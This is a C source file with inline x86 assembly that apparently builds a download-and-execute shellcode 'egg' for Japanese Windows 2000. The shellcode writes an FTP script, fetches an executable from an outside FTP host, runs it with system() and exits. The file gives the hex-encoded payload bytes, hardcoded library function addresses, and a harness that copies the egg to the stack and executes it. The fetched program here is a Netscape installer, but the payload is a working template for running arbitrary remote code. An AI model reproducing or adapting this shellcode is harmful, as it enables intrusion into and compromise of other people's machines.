/*

Simple egg
download and start installing Netscape4.79

tested on Japanese Windows 2000 Pro (SP2)

written by Kanatoko<anvil@jumperz.net>
http://www.jumperz.net/

compile:
$bcc32 egg_netscape.cpp

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
written in C:

FILE* handle;
char filename[]	= "q";
char command[]	= "binary\nget /pub/communicator/english/4.79/windows/windows95_or_nt/complete_install/cc32d479.exe\nquit";

handle = fopen( filename, "w" );
fputs( command, handle );
fclose( handle );
system( "ftp.exe -s:q -A ftp.netscape.com" );
system( "cc32d479.exe" );

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
HEX code:

0x55,0x8B,0xEC,0x53,0xEB,0x57,0x90,0x90,
0x90,0x5B,0x33,0xC0,0x88,0x63,0x01,0x88,
0x63,0x03,0x83,0xC3,0x68,0x88,0x23,0x88,
0x63,0x21,0x88,0x63,0x2E,0x83,0xEB,0x68,
0x53,0x83,0xC3,0x02,0x53,0xB9,0xC2,0x1B,
0x02,0x78,0xFF,0xD1,0x50,0x83,0xC3,0x02,
0x53,0xB9,0x8B,0x38,0x02,0x78,0xFF,0xD1,
0x59,0xB9,0xB8,0x0E,0x01,0x78,0xFF,0xD1,
0x83,0xC3,0x65,0x53,0xB9,0x4A,0x9B,0x01,
0x78,0xFF,0xD1,0x83,0xC3,0x21,0x53,0xB9,
0x4A,0x9B,0x01,0x78,0xFF,0xD1,0xB8,0x94,
0x8F,0xE6,0x77,0xFF,0xD0,0xE8,0xA7,0xFF,
0xFF,0xFF,0x77,0x58,0x71,0x58,0x62,0x69,
0x6E,0x61,0x72,0x79,0x0A,0x67,0x65,0x74,
0x20,0x2F,0x70,0x75,0x62,0x2F,0x63,0x6F,
0x6D,0x6D,0x75,0x6E,0x69,0x63,0x61,0x74,
0x6F,0x72,0x2F,0x65,0x6E,0x67,0x6C,0x69,
0x73,0x68,0x2F,0x34,0x2E,0x37,0x39,0x2F,
0x77,0x69,0x6E,0x64,0x6F,0x77,0x73,0x2F,
0x77,0x69,0x6E,0x64,0x6F,0x77,0x73,0x39,
0x35,0x5F,0x6F,0x72,0x5F,0x6E,0x74,0x2F,
0x63,0x6F,0x6D,0x70,0x6C,0x65,0x74,0x65,
0x5F,0x69,0x6E,0x73,0x74,0x61,0x6C,0x6C,
0x2F,0x63,0x63,0x33,0x32,0x64,0x34,0x37,
0x39,0x2E,0x65,0x78,0x65,0x0A,0x71,0x75,
0x69,0x74,0x58,0x66,0x74,0x70,0x2E,0x65,
0x78,0x65,0x20,0x2D,0x73,0x3A,0x71,0x20,
0x2D,0x41,0x20,0x66,0x74,0x70,0x2E,0x6E,
0x65,0x74,0x73,0x63,0x61,0x70,0x65,0x2E,
0x63,0x6F,0x6D,0x58,0x63,0x63,0x33,0x32,
0x64,0x34,0x37,0x39,0x2E,0x65,0x78,0x65,
0x58

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

*/

#include <stdlib.h>
#include <stdio.h>
#include <windows.h>

#define FPUTS	0x7802388b		// fputs()
#define EP	0x77E68F94		// ExitProcess()
#define FOPN	0x78021bc2		// fopen()
#define SYTM	0x78019b4a		// system()
#define FCLS	0x78010eb8		// fclose()

//-----------------------------------------------------------------------------
void hoge()
{
__asm
	{
	jmp	lbl1

	lbl2:
	pop	EBX
	xor	EAX, EAX
	
	mov	[ EBX + 1 ], AH		// set NULL
	mov	[ EBX + 3 ], AH		// set NULL
	add	EBX, 104		// avoid NULL
	mov	[ EBX ], AH		// set NULL
	mov	[ EBX + 33 ], AH	// set NULL
	mov	[ EBX + 46 ], AH	// set NULL
	sub	EBX, 104

	push	EBX			// fopen() 2nd arg
	add	EBX, 2
	push	EBX			// fopen() 1st arg
	mov	ECX, FOPN
	call	ECX			// call fopen()

	push	EAX			// fputs() 2nd arg
	add	EBX, 2 
	push	EBX			// fputs() 1st arg
	mov	ECX, FPUTS
	call	ECX			// call fputs()

	pop	ECX			// delete fputs() 1st arg
	mov	ECX, FCLS
	call	ECX			// call fclose()

	add	EBX, 101
	push	EBX			// system() arg
	mov	ECX, SYTM
	call	ECX			// call system( "ftp.exe ..." )

	add	EBX, 33
	push	EBX			// system() arg
	mov	ECX, SYTM
	call	ECX			// call system( "cd32d479.exe" )
	
	mov	EAX, EP
	call	EAX			// call ExitProcess()

	lbl1:
	call	lbl2
	
		// "X" will converted to NULL
	db	"wX"
	db	"qX"
	db	"binary"
	db	0x0A
	db	"get /pub/communicator/english/4.79/windows/windows95_or_nt/complete_install/cc32d479.exe"
	db	0x0A
	db	"quitX"
	db	"ftp.exe -s:q -A ftp.netscape.comX"
	db	"cc32d479.exeX"

	nop
	nop
	nop
	nop
	nop
	nop
	}
}
//-----------------------------------------------------------------------------
int main( int argc, char* argv[] )
{
LoadLibrary( "msvcrt.dll" );

char buf_stack[ 300 ];
const char nop6[] = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
int length = 0;

	//get length of egg
char* p = ( char* )hoge;
for( ;; ++length, ++p )
	{
	int r = strncmp( p, nop6, 6 );
	if( r == 0 )
		{
		break;
		}
	}

/*
	//print egg
p = ( char* )hoge;
for( int i = 0, j = 0; i < length; ++i, ++p, ++j )
	{
	if( (*p&0xFF) < 0x10 )
		{
                printf( "0x0%X," ,*p&0xFF );
		}
	else
		{
		printf( "0x%X,", *p&0xFF );
		}
	if( j == 7 )
	
		{
		printf( "\n" );
		j=-1;
		}
	}
printf( "\n" );
*/

	//copy to stack and execute
memcpy( buf_stack, ( char* )hoge, length );
char* egg_p = buf_stack;

__asm
	{
	mov	eax, egg_p
	call	eax
	}

return 0;
}
//---------------------------------------------------------------------------